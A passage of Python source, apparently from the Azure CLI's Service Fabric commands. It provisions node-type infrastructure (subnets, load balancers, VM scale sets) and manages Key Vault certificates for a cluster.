cluster.node_types.append(NodeTypeDescription(name=node_type_name,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
start_port=DEFAULT_APPLICATION_START_PORT, end_port=DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(
start_port=DEFAULT_EPHEMERAL_START, end_port=DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cmd.cli_ctx)(poller)
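# Provision the infrastructure for a new node type: pick an unused subnet prefix, create a public
# IP and load balancer with the default Service Fabric ports and probes, clone the OS, diagnostics
# and Service Fabric extension settings from an existing node type's scale set, and create the new
# virtual machine scale set.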
def _create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type_name, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity):
cli_ctx = cmd.cli_ctx
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory(cli_ctx)
location = _get_resource_group_by_name(cli_ctx, resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation(cli_ctx)(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type_name.lower(), index)
dns_label = '{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
if len(lb_name) >= 24:
lb_name = '{}{}'.format(lb_name[0:21], index)
poller = network_client.public_ip_addresses.create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
dns_settings=PublicIPAddressDnsSettings(domain_name_label=dns_label)))
publicIp = LongRunningOperation(cli_ctx)(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cli_ctx)
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation(cli_ctx)(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
network_config_name = 'NIC-{}-{}'.format(node_type_name.lower(), node_type_name.lower())
if len(network_config_name) >= 24:
network_config_name = network_config_name[0:22]
ip_config_name = 'Nic-{}'.format(node_type_name.lower())
if len(ip_config_name) >= 24:
ip_config_name = ip_config_name[0:22]
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name=network_config_name,
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name=ip_config_name,
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory(cli_ctx)
node_type_name_ref = cluster.node_types[0].name
vmss_reference = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type_name_ref)
def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
cli_ctx, resource_group_name.lower(), '{}{}'.format(name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory(cli_ctx)
LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(sku=Sku(name=SkuName.standard_lrs),
kind='storage',
location=location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Canonical'
offer = 'UbuntuServer'
version = 'latest'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type_name, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type_name,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss_reference.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type_name
fabric_ext.settings['durabilityLevel'] = durability_level
if 'nicPrefixOverride' not in fabric_ext.settings:
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name,
node_type_name,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(
name=vm_sku, tier=vm_tier, capacity=capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(
mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation(cli_ctx)(poller)
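# Find the scale set in the resource group whose Service Fabric extension references the given
# cluster id and node type name.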
def _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster_id, node_type_name):
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None:
curr_cluster_id = _get_cluster_id_in_sf_extension(fabric_ext)
if curr_cluster_id.lower() == cluster_id.lower() and fabric_ext.settings["nodeTypeRef"].lower() == node_type_name.lower():
return vmss
raise CLIError("Failed to find vmss in resource group {} for cluster id {} and node type {}".format(resource_group_name, cluster_id, node_type_name))
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ignored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ignored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ignored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ignored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ignored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ignored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ignored if \'--certificate-subject-name\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ignored if \'--certificate-subject-name\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
_create_keyvault.__doc__ = VaultProperties.__doc__
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
cli_ctx, vault, secret_identifier)
secret_url = secret_identifier
else:
if vault_resource_group_name is None:
logger.info("vault_resource_group_name not set, using %s.", resource_group_name)
vault_resource_group_name = resource_group_name
if vault_name is None:
logger.info("vault_name not set using '%s' as vault name.", vault_resource_group_name)
vault_name = vault_resource_group_name
vault = _safe_get_vault(cli_ctx, vault_resource_group_name, vault_name)
if certificate_file is not None:
if vault is None:
logger.info("Creating key vault")
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
logger.info("Import certificate")
result = import_certificate(
cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault is None:
logger.info("Creating key vault")
if cmd.supported_api_version(resource_type=ResourceType.MGMT_KEYVAULT, min_api='2018-02-14'):
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
else:
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
policy = _get_default_policy(cli_ctx, certificate_subject_name)
logger.info("Creating self-signed certificate")
_create_self_signed_key_vault_certificate.__doc__ = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'key_vault_client#KeyVaultClient').__doc__
result = _create_self_signed_key_vault_certificate(
cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
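# Adds the Key Vault certificate (vault_id/secret_url) to the VMSS OS profile secrets
# if it is not already referenced, then pushes the updated model with a long-running
# create_or_update call.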
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory(cli_ctx)
secrets = [
s for s in (vmss.virtual_machine_profile.os_profile.secrets or []) if s.source_vault.id == vault_id]
if not secrets:
if vmss.virtual_machine_profile.os_profile.secrets is None:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(certificate_url=secret_url, certificate_store='my'))
new_source_vault = SubResource(id=vault_id)
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(source_vault=new_source_vault,
vault_certificates=new_vault_certificates))
else:
if secrets[0].vault_certificates is not None:
certs = [
c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
if certs is None or certs == []:
secrets[0].vault_certificates.append(
VaultCertificate(certificate_url=secret_url, certificate_store='my'))
else:
return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
poller = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation(cli_ctx)(poller)
def _get_sf_vm_extension(vmss):
fabric_ext = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
if ext.type1 is not None and (ext.type1.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME)]
if fabric_ext is None or fabric_ext == []:
return None
return fabric_ext[0]
def _get_cluster_id_in_sf_extension(fabric_ext):
cluster_endpoint = fabric_ext.settings["clusterEndpoint"]
endpoint_list = cluster_endpoint.split('/')
cluster_id = endpoint_list[len(endpoint_list) - 1]
return cluster_id
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster_id, vault_id, secret_url):
threads = []
import threading
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
if vmsses is not None:
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None and (cluster_id is None or _get_cluster_id_in_sf_extension(fabric_ext).lower() == cluster_id.lower()):
t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
def _get_resource_group_by_name(cli_ctx, resource_group_name):
try:
resource_client = resource_client_factory(cli_ctx).resource_groups
return resource_client.get(resource_group_name)
except Exception as ex: # pylint: disable=broad-except
error = getattr(ex, 'Azure Error', ex)
if error != 'ResourceGroupNotFound':
return None
raise
def _create_resource_group_name(cli_ctx, rg_name, location, tags=None):
ResourceGroup = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'ResourceGroup', mod='models')
client = resource_client_factory(cli_ctx).resource_groups
parameters = ResourceGroup(location=location, tags=tags)
client.create_or_update(rg_name, parameters)
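# Maps a Service Fabric reliability level to the target seed-node instance count
# (None/Bronze/Silver/Gold/Platinum -> 1/3/5/7/9).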
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
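# Inverse mapping: picks the highest reliability level supported by the
# primary node type instance count.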
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if 0 < size < 3:
return 'None'
if 3 <= size < 5:
return 'Bronze'
if 5 <= size < 7:
return 'Silver'
if 7 <= size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
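# Flattens a list of SettingsSectionDescription objects into a
# {section: {parameter: value}} dict so individual settings can be looked up and merged.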
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
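# Rebuilds SettingsSectionDescription/SettingsParameterDescription objects from a
# {section: {parameter: value}} dict; the reverse of _fabric_settings_to_dict.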
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(name=k, parameters=parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(name=kk, value=vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
def _deploy_arm_template_core(cmd,
resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate_only:
deploy_poll = sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
deployment)
else:
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name,
deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
if validate_only:
return sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
properties)
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name, deployment_name,
properties)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
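# Builds the Key Vault certificate name from the subject name (or the resource group
# name), keeping only letters, digits and hyphens, and appending a timestamp suffix
# when no subject name was given.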
def _get_certificate_name(certificate_subject_name, resource_group_name):
if certificate_subject_name is None:
certificate_name = resource_group_name
else:
certificate_name = certificate_subject_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
if certificate_subject_name is None:
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
certificate_name = "{}{}".format(certificate_name, suffix)
return certificate_name
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name.lower() == vault_name.lower()]
if vault:
return vault[0]
raise CLIError("Unable to find vault with name '{}'. Please make sure the secret identifier '{}' is correct.".format(vault_name, secret_identifier))
def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
client = keyvault_client_factory(cli_ctx).vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _safe_get_vault(cli_ctx, resource_group_name, vault_name):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
try:
vault = key_vault_client.get(resource_group_name, vault_name)
return vault
except CloudError as ex:
if ex.error.error == 'ResourceNotFound':
return None
raise
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
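# Fetches the secret behind the identifier, loads it as PKCS#12 with a PEM fallback,
# and returns the certificate's SHA-1 thumbprint with the colons stripped.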
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
import binascii
certificate_data = open(certificate_data, 'rb').read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. '
'Please verify the certificate with OpenSSL.')
not_before, not_after = None, None
if x509.get_notBefore():
not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
elif certificate_policy and not secret_props:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
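# Exports a Key Vault certificate secret to disk: a PEM file containing the private
# key, certificate and any CA chain, and/or the raw PKCS#12 blob as a .pfx file.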
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
client = _get_keyVault_not_arm_client(cli_ctx)
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(cli_ctx, subject):
if subject.lower().startswith('cn') is not True:
subject = "CN={0}".format(subject)
return _default_certificate_profile(cli_ctx, subject)
def _default_certificate_profile(cli_ctx, subject):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
ActionType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#ActionType')
KeyUsageType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#KeyUsageType')
IssuerParameters = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.issuer_parameters#IssuerParameters')
KeyProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_properties#KeyProperties')
LifetimeAction = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.lifetime_action#LifetimeAction')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
X509CertificateProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.x509_certificate_properties#X509CertificateProperties')
Trigger = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.trigger#Trigger')
Action = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.action#Action')
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
